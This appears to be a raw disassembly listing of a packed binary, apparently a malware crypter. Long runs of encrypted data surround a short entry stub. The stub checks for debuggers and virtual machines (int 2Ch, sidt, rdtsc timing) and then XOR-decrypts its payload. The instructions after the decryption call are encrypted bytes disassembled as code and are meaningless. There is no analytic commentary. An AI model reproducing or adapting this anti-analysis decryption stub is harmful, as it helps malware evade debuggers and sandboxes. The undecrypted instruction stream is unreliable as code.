dd 72289FF2h, 671E9299h, 240B54B2h, 70C74FBCh, 87A0783Fh
dd 0A35594FFh, 0A9EDDB87h, 6BF67E79h, 45C88F85h, 646C4AC6h
dd 70D06777h, 0A5619930h, 0A339ACC5h, 0F6EEE28Fh, 1C84E534h
dd 43403E9h, 0D267BF32h, 8A984AD9h, 0F12564F7h, 0EB00A4BEh
dd 6AE7A960h, 7FC268C3h, 6D74D5A2h, 1DB2A311h, 3DCA102Ah
dd 9664570Bh, 0E128C4C2h, 1B71614Eh, 0D106857h, 3F5852B7h
dd 4EA94656h, 0B1A093B1h, 0A714E08Ah, 3273EDE2h, 81C8D666h
dd 0A430AAFDh, 2532047Fh, 6D29DD16h, 0B608EC5Ch, 8BE15B6Dh
dd 0CBA0A0BBh, 498A1FB9h, 0A9BB6482h, 90003121h, 8CD0182Ah
dd 0CF5EAAF3h, 0EF68A6C2h, 0AD1633F1h, 0AD85804Ah, 47E8DEA9h
dd 0E1B334F2h, 0F88E5E6Eh, 0BD3182DAh, 6F7CC2D6h, 0CB5D6374h
dd 0E0146650h, 0B96FAF42h, 17AC2C01h, 0B3A481DBh, 46C9DE8Eh
dd 0A580FA8Ah, 3DB407BBh, 0B796C92h, 0CC2446A4h, 1DFE4E8Fh
dd 18F47966h, 0C48D50BDh, 9BCEAEFEh, 37AC3DB5h, 0DAC36286h
dd 29980288h, 0C2BEEADh, 0DD254EFEh, 0C7E943C6h, 0A2B8B450h
dd 3AC77D97h, 413A09FAh, 4329CDA7h, 6E81C00h, 0C30AA01Bh
dd 0A24045DAh, 87C900A2h, 0E8D14772h, 2B263A3Bh, 44E1790Ah
dd 0E0FC1D3Eh, 5CB78CA2h, 0A3848860h, 0F9EF50BFh, 572C6FD5h
dd 7300C15Bh, 0B3071E0Eh, 0E5108A81h, 4864993Dh, 89912887h
dd 73F4864Eh, 4E4615BAh, 379C5263h, 20A2732h, 2CD519BFh
dd 31F5412Bh, 37BCB254h, 690855EDh, 40681D25h, 0DB0587Fh
dd 0F43E3946h, 26C91353h, 0D701373Fh, 46D08868h, 5957C579h
dd 0B45DAF3Bh, 0A4BB3E5Dh, 3D031419h, 0EF8DB1EFh, 9B1964F1h
dd 158DF961h, 0D62D1C73h, 5D7D4EACh, 358397C2h, 0E000B4E5h
dd 0F9EDC0F8h, 4E5B554Eh, 0F4C34571h, 4B541CEEh, 1C4B329h
dd 701C2126h, 0D9285400h, 7CFF05CEh, 304DABF1h, 671C3B2Eh
dd 7287DF4Eh, 7A988237h, 8FCC0E38h, 0EF10E0E1h, 0DDD48048h
dd 0F7FAAAC2h, 28204CA7h, 0BCA5A92Eh, 49FD1913h, 0E070FE1Bh
dd 97138B97h, 0AC19BDF6h, 0F21773BDh, 1A635B8Dh, 0A98F0394h
dd 0F833E500h, 0B45BA34Fh, 0A0E0C1F0h, 0A84F57F5h, 5DCFC101h
dd 0B658D8ADh, 73A9C911h, 0F2AF4469h, 28D3EF02h, 59A3F72Dh
dd 743B6033h, 9FF8681Fh, 0D7A3AD4Ah, 0E657D223h, 0D188241h
dd 1F731F65h, 0A78CAC0Eh, 7EBB7C32h, 5BCC9181h, 687048CAh
dd 3BAFCF97h, 13E1FC72h, 0A754D6ADh, 282B8205h, 77FCC83Eh
dd 371AEDF6h, 71C9005Fh, 6339D25h, 8197F276h, 0DFB6CFFEh
dd 0D6E49D8Fh, 6ED30555h, 4BB5AA6h, 21B834E4h, 3D61013Eh
dd 2330E889h, 0A07E9E95h, 89CB20A6h, 6B57FD6Eh, 9DC0F087h
dd 0B92825A6h, 0CCF80451h, 0EB64FEBEh, 0A6333CE5h, 0F4579236h
dd 59286C4Ah, 0DB25502Dh, 0F23FCF92h, 0A5B07765h, 0F5BD4A2h
dd 9BE4CF7Dh, 75B4E9C9h, 0B0C2F97Eh, 530A331Dh, 80D4162Dh
dd 0CD6230DFh, 0F5E7CAC6h, 81F22F1Ah, 6F77BF75h, 40BB9899h
dd 5515FAF5h, 796D8552h, 0D034F6CCh, 0AD38CC90h, 0D6CC9B26h
dd 9EFECA9Ah, 0B9F17E41h, 0A4B03833h, 6C493276h, 0A348CC9Bh
dd 0FB5D48CEh, 0D9088442h, 0D2D39560h, 0F3EC4B00h, 9EF5FCCDh
dd 0E500C1EEh, 3AAB375Dh, 99B89586h, 72F4864Eh, 0C8B742EEh
dd 279C0362h, 1D81431h, 7EA5E20Bh, 0B560F14Eh, 74435DE9h
dd 0E4897689h, 43446F2Ah, 15A030FAh, 0F7EC0C2Eh, 0D750BD92h
dd 0F384BEDEh, 7A36CEC2h, 2399F889h, 0BF685CFBh, 2AC80C8Ah
dd 6888004Ah, 0C75CE3DAh, 246F5410h, 7BF4B7BAh, 55306882h
dd 92FC4BA3h, 9D8255Ch, 14D1826Fh, 0AD59543Fh, 97ACAA06h
dd 0F1E3F05Ah, 5B7D2223h, 95E43DEAh, 0C6A1AFB6h, 0AD2DEC92h
dd 0CDC94669h, 88C0B023h, 0E2FBE412h, 41486D36h, 0BA42EFEh
dd 4870013Eh, 0CF2CDBEAh, 2A01CBE0h, 9396528Bh, 0FBC8707Ah
dd 0DF93B534h, 0EE47D951h, 0EB068FB6h, 0B9CD53AAh, 9C9CA2B4h
dd 69AA0CDFh, 0AF6F8E8Eh, 0A98FBF25h, 7CC1877h, 0A36041F9h
dd 0E5EFCEAEh, 7D6EAB36h, 90037F0Ah, 4B73DEADh, 691536EEh
dd 0FDE0701Eh, 85D26166h, 0A502C784h, 7CD4E41Dh, 7529FCEFh
dd 3F5C52B6h, 90BC5922h, 0E3B6CEF3h, 5DF56D9Ah, 2C8CAADFh
dd 91C8FCBFh, 0C809D7Eh, 357A2C73h, 0F09AF16h, 1A08EC72h
dd 2054670Bh, 6A0443F8h, 67D50EC3h, 51386492h, 850031FEh
dd 0FAD0182Ah, 0EF4DA05h, 3297332Fh, 83F61E9Bh, 62D2055Ah
dd 474CC222h, 592DBFF2h, 70E41E7Ch, 9FB1F8C0h, 0AF7CA2F2h
dd 8182B7C2h, 0AA27741Dh, 67422B9h, 7BC428Bh, 99758F52h
dd 0B944CE8Eh, 81AC33BCh, 6FB437B5h, 0DA286C92h, 33742E69h
dd 774B201Ah, 0EF46FB6Eh, 36DF23B1h, 0D9282B75h, 0F007885Ah
dd 4F2C5B12h, 29883CA2h, 1B23145Ah, 0F42C8279h, 73D943F6h
dd 1AB8B450h, 5B05562Dh, 7CD4DD5Dh, 1FDC32E6h, 0FB9C0C42h
dd 3B65FE79h, 527F3CF1h, 84C0717Fh, 13335C01h, 0C8321FB2h
dd 98E977AEh, 0FFC592E3h, 1F555A2h, 5094A6ACh, 72BECF9Eh
dd 0D0A1F8B7h, 317845EDh, 32468B24h, 0E365F87Ah, 0E92400DFh
dd 10CEBE36h, 541C6F1Eh, 17BF9F40h, 2480706Dh, 842F0478h
dd 0DB34D7FAh, 9570C8CAh, 0FAB9E39Bh, 0AD85F571h, 405446ECh
dd 0DB0587Fh, 9F4B8946h, 0D138E492h, 22ACFDF5h, 85D0CBADh
dd 1F998576h, 38685CFDh, 67B4260Eh, 0E543C75Dh, 67EC7A06h
dd 981C3105h, 7BE48E2Eh, 5244788Ah, 0D827AA84h, 8292E3DDh
dd 0F35632E3h, 346533BAh, 9A47824Dh, 333809D9h, 49A75E8Eh
dd 6E1B3B01h, 7B59E51Eh, 0DA28FCBBh, 0C774C6CEh, 45452B0Eh
dd 640C6A24h, 511AE43Fh, 0B7212DFEh, 0F4F01808h, 0DF76699Eh
dd 0EBF43969h, 0C9ED963Eh, 0D4230372h, 756D428Ch, 49DBA702h
dd 6F81755Eh, 0AD50C8E8h, 9F9C9B66h, 20E0CE43h, 0D964258Fh
dd 3DB9C24Fh, 8349ED26h, 0E118E44Bh, 0CF44CEBEh, 0FD3DAB0Ch
dd 0D9FC9246h, 0CDCDABA2h, 239426D7h, 88E0123Ah, 20EA1492h
dd 0A1414057h, 8FC49E1Eh, 0EF160D6Ah, 2F65D103h, 9D2DDB02h
dd 0F3F41677h, 0B840E0DAh, 0A58B30EDh, 57DA3EF0h, 52CF999Ch
dd 0F7424F40h, 0ED6A20BCh, 8DDACF95h, 4C30F425h, 2023E8F8h
dd 77FCC81Ah, 0EEBC6B92h, 0D47BC124h, 1592609Fh, 6D890D76h
dd 4668DCFCh, 83F6D2BBh, 4B957F5Ah, 0CA4C4A98h, 31DA547Fh
dd 9371833Eh, 8430F8C8h, 507CA884h, 998AC097h, 0C581896Eh
dd 0C2604084h, 7EE76B3h, 0D76DFB52h, 4644CEA0h, 0B5D1F05Fh
dd 27696D36h, 0F287CC0h, 0DD6D331h, 0A843200Ah, 0E71CB83Ah
dd 0C1B017B2h, 0C6A4AEFEh, 98718920h, 4F2C5A19h, 0E887CCBAh
dd 13C196ABh, 1EE0757Ah, 47930245h, 113D651Dh, 0A8046E4Bh
dd 6F504897h, 798047F6h, 0F5CC70C3h, 0C04197E2h, 524428BAh
dd 82B965D9h, 9EE2C19Ah, 0C4B6A641h, 3BD1D7F5h, 0B9842FA9h
dd 0ECF0CE96h, 0C394B6EEh, 821F35D2h, 0DC151F79h, 0BC486096h
dd 1B8556ABh, 0ED40736Ah, 0B96653D0h, 0CF8DDF00h, 8CF48626h
dd 2784EB9Ah, 0D8DC68E6h, 11E6E6A7h, 0D3E06D7Eh, 8A2CF64Bh
dd 8CC9FE29h, 810CBAE1h, 0BCABACCCh, 0E25F4F12h, 4F2F6BB9h
dd 0D138E4E6h, 843C0F35h, 6DD0982Ah, 5F1C726Bh, 81686C00h
dd 13B4263Eh, 0ED0010B2h
dd 0C76818A6h, 0A199314Ah, 7BE7663Eh, 79F2688Ah, 0B28CFD6h
dd 8AE6D12Eh, 0FA68F696h, 0BD6038DAh, 0C327AA06h, 0FAA5B476h
dd 2DA9DF84h, 0CD9028D3h, 23F2D1h, 0D92C2EE3h, 0B076C1CFh
dd 0EC26A61Fh, 6E1977A2h, 119415FFh, 0FF8B0100h, 0C3906893h
dd 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h, 64FAEB00h
dd 18A167h, 0F30408Bh, 830240B6h, 427500F8h, 0E8h, 0ED815D00h
dd 402338h, 2385858Bh, 85030040h, 40238Dh, 858BF08Bh, 402389h
dd 238D8503h, 60500040h, 0C933FE8Bh, 2395958Ah, 32AC0040h
dd 0AAD002C2h, 918D3B41h, 7C004023h, 2BC361F1h, 30FF64C0h
dd 0B8208964h, 12345678h, 60000387h, 7BB00000h, 0
dd 1E003142h, 100000h, 22Bh dup(0)
dd 0FFFFh, 134Ch dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_3143202E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31432006 proc near ; CODE XREF: UPX2:3143207D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_3143200E: ; CODE XREF: sub_31432006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_3143200E
pop ebx
retn
sub_31432006 endp
; ---------------------------------------------------------------------------
aad 41h
loc_3143201F: ; CODE XREF: UPX2:31432068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_31432021: ; CODE XREF: UPX2:31432036�j
; UPX2:31432047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_31432055
; =============== S U B R O U T I N E =======================================
sub_3143202B proc near ; CODE XREF: UPX2:3143204A�p
; UPX2:31432050�p
rdtsc
retn
sub_3143202B endp
; ---------------------------------------------------------------------------
loc_3143202E: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_3143203A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_31432021
jmp short loc_31432049
; ---------------------------------------------------------------------------
loc_3143203A: ; CODE XREF: UPX2:31432030�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_31432021
loc_31432049: ; CODE XREF: UPX2:31432038�j
push ebp
call sub_3143202B
xchg eax, ecx
call sub_3143202B
loc_31432055: ; CODE XREF: UPX2:31432029�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 9E06h
sub eax, 100h
jnb short loc_3143201F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_31432006
db 3Eh
inc ecx
popf
dec ebx
enter 0FFFFAD5Fh, 0CDh ; CODE XREF: UPX2:31432094�j
add ebx, [esi+47CBABCh]
popa
adc [ebx-18h], ebp
jns short near ptr loc_31432086+2
mov ds:5F8A98B3h, eax
and [esi+2Ah], ebp
xor eax, 95EC3DDDh
add byte ptr [eax-25h], 0BEh
test [esi-24ABCE03h], ch
stosb
ror esi, cl
mov edi, 2E509B93h
dec edx
mov edi, 1D345A0Dh
bound esp, [esi-6C343AF2h]
xchg eax, ecx
mov esp, 0D1A18F87h
mov bh, 0BEh
pop ss
or eax, eax
call near ptr 0B13F9C81h
into
ror dword ptr [ecx], 1
and al, 6Bh
and dword ptr [esi+38CBFB1Eh], 3A874A0Dh
outsd
inc ebp
mov dl, [eax]
jl short loc_3143212F
bound edx, [edx]
push edx
and al, 61h
xor al, 96h
call near ptr 0AF991C13h
lock xchg eax, ebp
jg short loc_31432158
xlat
lodsb
scasb
rcr byte ptr [esi-609F115Ch], 0ADh
loc_31432102: ; CODE XREF: UPX2:3143214A�j
aad 72h
test [eax-21089F3Ah], esi
push esp
int 3 ; Trap to Debugger
iret
; ---------------------------------------------------------------------------
db 34h, 0C4h, 5Fh
dd 760B3ADCh, 0E24E0E4Bh, 0C5710111h, 0DE3C1F17h, 498C190h
dd 0C2B32C2Eh, 227DC08Eh
; ---------------------------------------------------------------------------
loc_3143212C: ; CODE XREF: UPX2:loc_31432158�j
rcl esi, 1
stosd
loc_3143212F: ; CODE XREF: UPX2:314320E4�j
xchg eax, edx
sub al, 0E3h
inc ebp
mov ch, 0FCh
daa
adc al, 0E6h
; ---------------------------------------------------------------------------
db 8Fh, 3Ah, 71h
; ---------------------------------------------------------------------------
pop ds
xor [ebx-232B64Fh], eax
mov ebx, [ebp+5Fh]
mov bh, 3Ah
or al, 63h
jnp short loc_31432102
mov ecx, [esi]
mov dword ptr [ecx-1B866B49h], 0EE101E3Ah
loc_31432158: ; CODE XREF: UPX2:314320F5�j
loopne loc_3143212C
cmpsd
inc ebp
and [ebp-40h], ebp
cmp ecx, esi
; ---------------------------------------------------------------------------
db 0FEh, 0D2h, 0C9h
dd 66C1CCA0h, 0DEB4A12Bh, 0B7187357h, 7292D790h, 346415Bh
dd 0CD5B60A3h, 602B9F9Eh, 0C79E8708h, 14D7CCCCh, 0B047E389h
dd 3CFED5E7h, 40A5A71Eh, 7DCDAAD9h, 0FA9A3E0Dh, 961A4066h
dd 8C26B80h, 0C46896B0h, 0F6FA6599h, 3386819Ch, 8D92D72Fh
dd 20B3DE0Ah, 5DDDB37Eh, 2523084Ch, 6BF73222h, 51EFBCB1h
dd 0C54D507Fh, 0C23C6706h, 0CEC6817Dh, 536AA5B8h, 0AA05A36Bh
dd 9398C3C1h, 0BAE6C54h, 0DD4FEFC0h, 48D313BEh, 5E1F9C1Dh
dd 0F8090423h, 0BC31B6DFh, 5C929161h, 9AA2FA9Ah, 0D90F6C04h
dd 65256795h, 0CF891128h, 9D0126D4h, 3D976217h, 14CB45FCh
dd 58EE1A70h, 9190CF2Eh, 41C776Eh, 5EB67E98h, 0B7B2F17Ch
dd 0A6F68C8Ah, 8B79C9A1h, 7A8FBEB8h, 10A6D1A7h, 0C92918E6h
dd 0BAD2CDD6h, 8E6D1BD4h, 6002B28h, 837F1241h, 0F02E5D58h
dd 0BDADB16Fh, 985DEDD1h, 0DE739FF5h, 171F4AB4h, 65A1FCE0h
dd 24B6E2E8h, 102C6D06h, 540C0F20h, 8EFB2626h, 7E123F96h
dd 76705439h, 534A0160h, 0F37BEB14h, 199F7298h, 0DD800D2Ch
dd 79CC7F6h, 1FB05059h, 36CE1BF4h, 18910A0Bh, 62BA6D65h
dd 5510ADC8h, 25A94F7Eh, 0A70B71DBh, 3DFB44Fh, 0D559B8EAh
dd 413A61Bh, 397C005h, 3604655Bh, 3EC3EEDFh, 47D85C82h
dd 2074971Ch, 8B08031Eh, 0E904B39h, 0A2064A59h, 9274C5F6h
dd 2F9B8FBEh, 6074A6A5h, 0FE92BF86h, 39385158h, 5C40EADAh
dd 0C4538E00h, 0D9ED283Ch, 5F2FA990h, 86E4B944h, 86B5525Bh
dd 3F497470h, 0FB4C0A0Ch, 0E3075DA0h, 0D2033C38h, 0AD24D0FEh
dd 278BCD68h, 3ED10303h, 5514941Ch, 0E7742A29h, 81266DBAh
dd 0E9D241B5h, 35C1E06Ch, 475BB6AFh, 0ED590726h, 0F4764BB2h
dd 0D027C4C9h, 0CAB6E1E1h, 39CCF611h, 631CB383h, 0AA712514h
dd 0A5E73C50h, 102C23AEh, 0EA556989h, 0AB01787Ch, 5575F296h
dd 0DF913818h, 6877FC4h, 193CDCDBh, 0CB380CBFh, 0C7756FF6h
dd 60F56D1Bh, 0DC6A3735h, 252709C1h, 0C3968151h, 37AA9ED1h
dd 0BB68F945h, 0EA7FCAFCh, 1FC0D34h, 18C6135Dh, 2FC2ED85h
dd 14996E0Ch, 0BFE7148h, 5E8EA7CFh, 0A464977h, 0F45D209Ah
dd 3C4C7715h, 4563E458h, 8F7ECF6Fh, 0AE93D6BAh, 47C0D3BBh
dd 40BEE988h, 0BEBEAEFFh, 0DA7EE946h, 31021D00h, 8AE6C11Ah
dd 9C3166DEh, 0B3F2FF71h, 735EB998h, 0E175A88Ah, 5D7F583Dh
dd 1FA3234Ch, 0A334E4D4h, 3DFFEEFDh, 0C66BF1EDh, 69CD317Ah
dd 0C181C06Ch, 7F2B6679h, 0AE426D7Ah, 0AE36EBCFh, 0AE20EBEFh
dd 9FEEC4D8h, 5CFBAEADh, 44C1B3BEh, 0C79AF5B7h, 7ECAD598h
dd 0B97DAA23h, 2B0F0A12h, 0F8063B04h, 3CA89798h, 45544F52h
dd 0E81EC955h, 0B880C73Ah, 6F4D4F95h, 0D4788DBh, 60C5F0F1h
dd 2BB9436Dh, 2DA3796Bh, 1A63435Dh, 8D442B2Eh, 79AD9C34h
dd 304F4A52h, 8430C754h, 162AFEF7h, 30B8C62Bh, 76E56D5h
dd 0E35514BBh, 2ED73228h, 0A5EC7319h, 412935BAh, 8934FE46h
dd 0B4A45E5Dh, 9246FC95h, 589EDBDFh, 0E4488FF3h, 5E0C4C8Ah
dd 1296FD3Dh, 0D6EBB3E7h, 70FEA86Bh, 22299115h, 93836D77h
dd 7BF93046h, 0F1267D2Dh, 4D6F1A70h, 0F970CA12h, 94B31B9Eh
dd 2622669h, 3DA1CCC8h, 1554732Ah, 10207DC3h, 7A910F21h
dd 781BE7A6h, 2B423D3Dh, 0C6780204h, 38BF383Bh, 0C467A97Fh
dd 0AF37591Ch, 0D6F14FBFh, 0E41948CFh, 0C8B2EDF2h, 0C8370E99h
dd 804AF55Fh, 88F61109h, 52C9B9A0h, 0C6244F4Eh, 83F6F399h
dd 2AAD7D4Dh, 0D659BF59h, 127A4542h, 497C23Dh, 28F7D8D9h
dd 6392BF39h, 48DB6D56h, 9A7A1C19h, 79626362h, 4F4D8EC1h
dd 0F7400437h, 45AD9078h, 44E97070h, 0E84BB3EAh, 0AFC3ECEFh
dd 3D78412Bh, 0E93CEADBh, 0BC5DC222h, 59B54040h, 70040F7Ah
dd 871B56E7h, 9E325D5Dh, 0B5497473h, 0CC608B8Ah, 1C24F4F0h
dd 0CAA5602Dh, 0BDFC7BCFh, 0D3CE2662h, 6312121Fh, 309B7256h
dd 0E924B64h, 0E8740E24h, 0EA593B32h, 0D3213C32h, 0B532D0F1h
dd 0B272E8E8h, 96FBC0C0h, 60A0BFABh, 4FC49592h, 79CC999Dh
dd 24826B7Dh, 0A936340h, 3E117D5Eh, 0E0493620h, 0C7562C0Ch
dd 0B237CCE5h, 0BE03F1E7h, 82C7AFEFh, 62EFA7A0h, 7DDEAE8Ch
dd 74B48196h, 2EAC4A0Ah, 33905441h, 0C635A53h, 0FD4B1A28h
dd 0A65E0401h, 0DC340E38h, 0BC3CF6E6h, 8F1ECFDBh, 67E482C0h
dd 4DC9A3B6h, 58AE8281h, 75A96860h, 3D9E4829h, 1C6F4141h
dd 0F25B493Ch, 0C9611436h, 0DC2D1204h, 0BB06C98Dh, 8316CCE2h
dd 8FE5C8FAh, 60DDB1BBh, 2BFF9A8Ch, 7A16547h, 4897B7Fh
dd 6E665445h, 0C36E2004h, 0C8543033h, 0B32D1E18h, 872BEFCFh
dd 8D03C5F0h, 94E4FED3h, 62C581A8h, 61BAA481h, 529D8F9Eh
dd 368B6776h, 0D904860h, 80542552h, 0C4583212h, 0CB371D15h
dd 0B733C1EEh, 0B305FFFFh, 0F3C9CAC3h, 5EEBAF8Fh, 67C58DBAh
dd 76AE9A9Fh, 0F87606Ch, 109C6323h, 0B7D5E6Dh, 0FA533300h
dd 0CC796926h, 0B230D60Ah, 0B903FEE6h, 9AE6E9ACh, 76E8A095h
dd 59DEB4B3h, 74C6B089h, 268B7C6Dh, 3A996A72h, 196D587Dh
dd 0F9432039h, 0E5570B0Bh, 0CF353C79h, 0B609FBC7h, 0AD0DDEC8h
dd 63F0B2D7h, 6ED9B9A1h, 41ADABECh, 5B46261h, 39807675h
dd 10697D2Fh, 0EA740422h, 0E6463E2Fh, 0D7067635h, 0A80BDBFBh
dd 0A21FEBD5h, 0FBF5D7D0h, 7CC2A29Fh, 4CD181A1h, 30A39FB3h
dd 178D7B7Ch, 871632Bh, 0EB6A132Ch, 0E85C3F3Ah, 0DD342170h
dd 0BA2EEDE4h, 8932ADADh, 0F7FFC5C7h, 6DCDBF9Ch, 16CB9086h
dd 44ABB7C8h, 37B71065h, 1BA4346h, 2C135B51h, 0FF6C2131h
dd 0D9000907h, 0A631F1F6h, 0A80AEEECh, 97D5B1F1h, 65F48EB3h
dd 49DC8EBBh, 45AC809Bh, 3985580Ch, 69B4B64h, 1F63506Ch
dd 0F449034Fh, 0FD3C1703h, 0CF321313h, 0A10FFCC2h, 84C7CAE4h
dd 5298A6AEh, 6EDAABB0h, 5E858391h, 48B8696Bh, 2A9B6F4Ah
dd 19607256h, 0F86E4B2Fh, 0D65D0620h, 0C81E0D0Bh, 0BD0CE6E6h
dd 9B19C0C3h, 9AF8D1E9h, 62E4D5BAh, 4CA599A8h, 2A916776h
dd 17EE7C74h, 1577735Ah, 0D7793324h, 0FB50312Eh, 0FB4A0600h
dd 0A913CFFEh, 0B31DD7C0h, 9FECD5CAh, 69E3A2BCh, 6BC8A9E6h
dd 4BB3988Fh, 368C4771h, 26F425Eh, 0CE630C41h, 0F3782939h
dd 0D70A070Ah, 0BC3FE2D5h, 0DF1DF1F4h, 86C5C1FAh, 64E7A2AEh
dd 6AB7878Eh, 5EBDB78Dh, 3E965F7Eh, 14884345h, 1B795268h
dd 0E167543Dh, 0C2251B25h, 0B734E7D2h, 0DA00F6F1h, 83D5C4E1h
dd 6BF9B3A9h, 6DDB8BA9h, 5AA98680h, 23B26F46h, 2CF65853h
dd 1C786943h, 0E977363Ch, 0CA5E1216h, 0D1341335h, 0A108F9E1h
dd 0ECEEC4C3h, 71C0B68Fh, 4CC8ACB1h, 44B79C86h, 22976967h
dd 24837371h, 187C6132h, 0E876241Ch, 0F153050Fh, 0D7240A03h
dd 910BDBE9h, 0B412D5CBh, 90FBCFC8h, 46FED4B4h, 4DCBB9ABh
dd 32A37573h, 37817B17h, 774A5Eh, 0F27E2D27h, 0F35D3E5Bh
dd 0C02A111Ch, 0BF05EC89h, 9604CDC8h, 98E0C0D5h, 62A5B5A3h
dd 27CD8580h, 5ABF998Fh, 37876013h, 6A8B4F42h, 0E4622F76h
dd 0EC483624h, 0DC2B032Eh, 0A83ACEE1h, 0DD17F1FFh, 91FDDAFBh
dd 7FC5A5BBh, 61C284A7h, 5CA29998h, 2B867A6Dh, 119B5177h
dd 12583C5Fh, 0FD5A3625h, 0DA701E0Dh, 0C117EF1Ah, 0BD19F6DFh
dd 9BE1C1DFh, 68FEB68Bh, 5CDDAE8Eh, 40A9BBF2h, 2FB07B6Ch
dd 190726Bh, 1B657151h, 0CA624E29h, 0EC6A2435h, 0F87F4E49h
dd 8168DFDDh, 863CCDCDh
dd 4AF3B2D0h, 4AACAEB3h, 5F8D8A88h, 20926A61h, 1A885E63h
dd 15626030h, 0FB7B3C16h, 0CC543627h, 0CF091200h, 0AB318ECDh
dd 911FF6C4h, 89FDDDECh, 52D096B4h, 2F576AE8h, 298537D4h
dd 0BFEB1616h, 6D2661A1h, 80734429h, 0F6630B0Bh, 0E38BF974h
dd 9E0E5D03h, 0B324E0F5h, 651948E5h, 8CA3FEE1h, 0B346E820h
dd 3DFFD65Eh, 90EED591h, 0C078A57Fh, 0B3140F2Bh, 974106AAh
dd 3BBD6306h, 0C569A8CAh, 587F5B1Fh, 0F387B221h, 6ACAA198h
dd 0F53FDFDFh, 0F441F59Ch, 4E894C67h, 0EF83323h, 7B65683Bh
dd 92460538h, 0F83D0267h, 55AB2F2Dh, 0D75BBA18h, 7B7DF4F3h
dd 5A9EF0Eh, 40DB255Fh, 26457D7Ah, 453F0738h, 4FF38B93h
dd 0A7093504h, 5FDE1F1Ch, 8845E6E9h, 34C27A49h, 0D2668AA8h
dd 1682FC4Fh, 91113441h, 9AAAE5F9h, 2EDB6E63h, 0BB94EA03h
dd 0DF65E6E6h, 71351CAEh, 9390C8CBh, 0ADDB5E5Dh, 3DB58A8Bh
dd 0FD4D090Eh, 90B826A2h, 620037B2h, 0FAA6D1CBh, 0D64318FAh
dd 838D3A75h, 56E9FC40h, 0EC5D2B2Bh, 0B40DC4AFh, 16E76A59h
dd 826590F5h, 9808D687h, 0B122CECFh, 0DB8B204Ah, 0A26CCFCh
dd 0E8221DC7h, 61CDC8D1h, 7E40BD3h, 68FB26CFh, 9293603Dh
dd 96194EE1h, 38CD9401h, 0C4679802h, 0FBA3CBC9h, 0F2AFB094h
dd 6F900344h, 3A745819h, 1705F3C5h, 57178FCBh, 63D22112h
dd 0B9503812h, 904E4E25h, 0DBC45599h, 3A478279h, 0BE99E054h
dd 0ED80ABA0h, 7CC1249h, 0AE20E489h, 32F3F414h, 49D6BF8Ch
dd 0D47A1C1Dh, 7508323Bh, 4734B249h, 50FDEA01h, 0BF3919DEh
dd 3A916DC8h, 0E7BC2564h, 0AC4636EAh, 42F9185Fh, 7FEEAA81h
dd 0D629FE68h, 59DD3485h, 0FB08EBADh, 0B7374FD0h, 1DE5765Ch
dd 0B28E7399h, 0CC888BE0h, 2074F528h, 0D6792CD1h, 95A0D0FFh
dd 0E888EEEEh, 0B6CB4CBFh, 65C4E481h, 0E61DDD2Ah, 7CBC2002h
dd 5ACC2D9Eh, 0B044873Bh, 46068685h, 0EE69EB71h, 0E143FB3h
dd 8FA0FBE6h, 23BEC59Dh, 3A7573F7h, 0BC620E0Fh, 66FA272Dh
dd 7C15546Fh, 1D75352h, 0AB0F4640h, 46DB7D0Bh, 0D96C9CB3h
dd 0F0EEFFAEh, 79BC22Dh, 4AE38ADCh, 0A038A5F3h, 4BEE252Fh
dd 0F678E913h, 780C3632h, 8D491F1Ch, 0CE3B0F35h, 0FD517C7Bh
dd 25FD6CC0h, 7D7F9A82h, 59E23745h, 1DC48387h, 67C2EDEFh
dd 66FDB0FAh, 0A3F01B19h, 432BEBA4h, 4A9B1048h, 0B5D6762Bh
dd 0D298FC26h, 9832DC8Dh, 93EF5AF2h, 0A4918C97h, 0C4DD1357h
dd 0E62B16BFh, 0CCD5302Bh, 0BE5341h, 0E35B6A46h, 851B41D4h
dd 5C02F75Ah, 4011631Bh, 9A0FDA23h, 0B126F1CFh, 11847E4h
dd 8EA4FFE6h, 26B8ED20h, 19A404FBh, 9A72ED1Ah, 3AFE1904h
dd 0ACDCD5C1h, 55715765h, 90C36E68h, 835BF089h, 0C90D1111h
dd 0EA6BB381h, 1A9F5F45h, 0F0B6E0EFh, 0BC1909A0h, 0B16A02CDh
dd 6BF92423h, 7B10CBBDh, 0A819D250h, 29787912h, 445A8040h
dd 0D76C9774h, 9BA3902Ch, 3B1B8332h, 5BFE928Ah, 0FC4DD384h
dd 6DC4ECEh, 35A5D135h, 255D6734h, 0A1E3D8B4h, 9F606452h
dd 4D574B8h, 3B679290h, 0E97EA916h, 52C5FE3Fh, 92A4809Ch
dd 2EC1EC49h, 0E8D0C580h, 0DEE01725h, 710631B6h, 7B68687Ah
dd 900E63F1h, 0B64BFAF1h, 0ED6F208Bh, 0D9598482h, 8FF5DC98h
dd 2E0BADA5h, 0A8C19DC7h, 28F30180h, 279F6161h, 1D0252AAh
dd 0F1376C78h, 64689C31h, 8777E70h, 0C95DAF97h, 1F267D69h
dd 0C7A7DF20h, 5E62FECCh, 0CDE8B3B3h, 3CCEF9F3h, 3C927F55h
dd 0C9D484Bh, 0AE86C13Dh, 132A6578h, 9E7718ABh, 3FDD0A4Bh
dd 8A6FAAB5h, 0F285B1D8h, 5FCC9943h, 0F526218Eh, 0BAC9C4D9h
dd 7DFB7B99h, 0AAC47222h, 285E686Ch, 4DA011Eh, 0A80C4B67h
dd 40777AFAh, 0E6415801h, 6D4254ABh, 348DAC4Fh, 0D857D8D9h
dd 36E0B37Bh, 48DB06EFh, 0B373401Dh, 7539294Eh, 0BC63F6C1h
dd 16BC6251h, 0BA7E4933h, 5CEE6B8Ch, 0E84C97E1h, 7A181B4Eh
dd 169AE597h, 1DFF7E60h, 0C6D40232h, 59DE292Fh, 0F86D32A7h
dd 781C4756h, 0AE1F37C9h, 0E9839E73h, 0A517E9CEh, 0B324C6C2h
